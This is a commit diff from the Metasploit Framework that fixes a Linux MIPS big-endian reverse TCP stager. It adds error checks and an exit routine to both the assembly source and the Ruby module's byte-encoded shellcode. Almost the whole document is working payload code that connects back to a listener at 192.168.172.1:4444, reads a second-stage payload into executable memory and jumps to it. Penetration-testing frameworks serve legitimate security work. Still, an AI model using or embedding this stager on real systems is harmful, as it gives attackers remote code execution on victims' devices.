fix reverse tcp stager src

tkmru · tkmru · commit d02d6826a932 · 2017-07-05T17:56:59.000+09:00
diff --git a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
@@ -4,7 +4,7 @@
 #        Type: Stager
 #   Qualities: No Nulls out of the IP / Port data
 #   Platforms: Linux MIPS Big Endian
-#     Authors: juan vazquez <juan.vazquez [at] metasploit.com>
+#     Authors: juan vazquez <juan.vazquez [at] metasploit.com>, tkmru
 #     License:
 #
 #        This file is part of the Metasploit Exploit Framework
@@ -29,12 +29,11 @@
 ##
 	.text
 	.align  2
-	.globl  main
+        .globl  main
 	.set    nomips16
 main:
 	.set    noreorder
 	.set    nomacro
-
 	# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
 	# a0: domain = PF_INET (2)
 	# a1: type = SOCK_STREAM (2)
@@ -47,8 +46,9 @@ main:
 	slti    $a2, $zero, -1
 	li      $v0, 4183
 	syscall 0x40404
-
-  sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
+	sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
 
 	# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
 	# a0: sockfd
@@ -69,6 +69,8 @@ main:
 	nor     $a2, $t4, $zero
 	li      $v0, 4170
 	syscall 0x40404
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
 
 	# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
 	# a0: addr = -1
@@ -92,7 +94,8 @@ main:
 	sw      $2, -5($t3)         # Doesn't use $sp directly to avoid nulls
 	li      $v0, 4090
 	syscall 0x40404
-
+  slt $s0, $zero, $a3
+  bne $s0, $zero, failed
 	sw      $v0, -8($sp)        # Stores the mmap'ed address on the stack
 
 	# read(sockfd, addr, 4096)
@@ -106,6 +109,8 @@ main:
 	addi    $a2, $a2, -1
 	li      $v0, 4003
 	syscall 0x40404
+  slt $s0, $zero, $a3
+  bne $s0, $zero, failed
 
 	# cacheflush(addr, nbytes, DCACHE)
 	# a0: addr
@@ -119,11 +124,20 @@ main:
 	add     $a2, $t1, $0
 	li      $v0, 4147
 	syscall 0x40404
-
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
 	# jmp to the stage
 	lw      $s1, -8($sp)
 	lw      $s2, -4($sp)
 	jalr    $s1
 
+failed:
+	# exit(status)
+	# a0: status
+	# v0: syscall = __NR_exit (4001)
+	li      $a0, 1
+	li      $v0, 4001
+	syscall 0x40404
+
 	.set    macro
 	.set    reorder
diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
@@ -41,6 +41,7 @@ def initialize(info = {})
             "\x21\xe5\xff\xfd" +  #  addi    a1,t7,-3
             "\x28\x06\xff\xff" +  #  slti    a2,zero,-1
             "\x24\x02\x10\x57" +  #  li  v0,4183
+            # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x36" +  #  bnez    s0,0x4006bc <failed>
@@ -58,6 +59,7 @@ def initialize(info = {})
             "\x24\x0c\xff\xef" +  #  li  t4,-17
             "\x01\x80\x30\x27" +  #  nor a2,t4,zero
             "\x24\x02\x10\x4a" +  #  li  v0,4170
+            # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x25" +  #  bnez    s0,0x4006bc <failed>
@@ -74,6 +76,7 @@ def initialize(info = {})
             "\xad\x60\xff\xff" +  #  sw  zero,-1(t3)
             "\xad\x62\xff\xfb" +  #  sw  v0,-5(t3)
             "\x24\x02\x0f\xfa" +  #  li  v0,4090
+            # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x15" +  #  bnez    s0,0x4006bc <failed>
@@ -83,6 +86,7 @@ def initialize(info = {})
             "\x24\x06\x10\x01" +  #  li  a2,4097
             "\x20\xc6\xff\xff" +  #  addi    a2,a2,-1
             "\x24\x02\x0f\xa3" +  #  li  v0,4003
+            # read(sockfd, addr, 4096)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x0c" +  #  bnez    s0,0x4006bc <failed>
@@ -92,6 +96,7 @@ def initialize(info = {})
             "\x01\x20\x48\x27" +  #  nor t1,t1,zero
             "\x01\x20\x30\x20" +  #  add a2,t1,zero
             "\x24\x02\x10\x33" +  #  li  v0,4147
+            # cacheflush(addr, nbytes, DCACHE)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x03" +  #  bnez    s0,0x4006bc <failed>
@@ -101,6 +106,7 @@ def initialize(info = {})
             # 4006bc <failed>:
             "\x24\x04\x00\x01" +	#  li	a0,1
             "\x24\x02\x0f\xa1" +	#  li	v0,4001
+            # exit(status)
             "\x01\x01\x01\x0c" +	#  syscall	0x40404
             "\x00\x20\x08\x25" +	#  move	at,at
             "\x00\x20\x08\x25"    #  move	at,at
